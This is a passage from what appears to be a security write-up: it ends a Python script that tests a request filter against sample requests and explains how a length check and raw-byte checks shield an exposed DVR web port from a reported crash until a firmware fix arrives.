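    for name, raw in SAMPLE_REQUESTS.items():
        print("%-9s block=%-5s %s" % (name, should_block(raw), "; ".join(inspect_request_line(raw))))
```

The length check alone stops the request shown in the report, since the crash needs more bytes in the request-target than any legitimate page on the DVR uses; the other checks catch variants that keep the target short but still smuggle raw bytes. None of this replaces a firmware fix, but it is what a device owner can deploy today in front of a port that should never have been exposed to the WAN in the first place.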

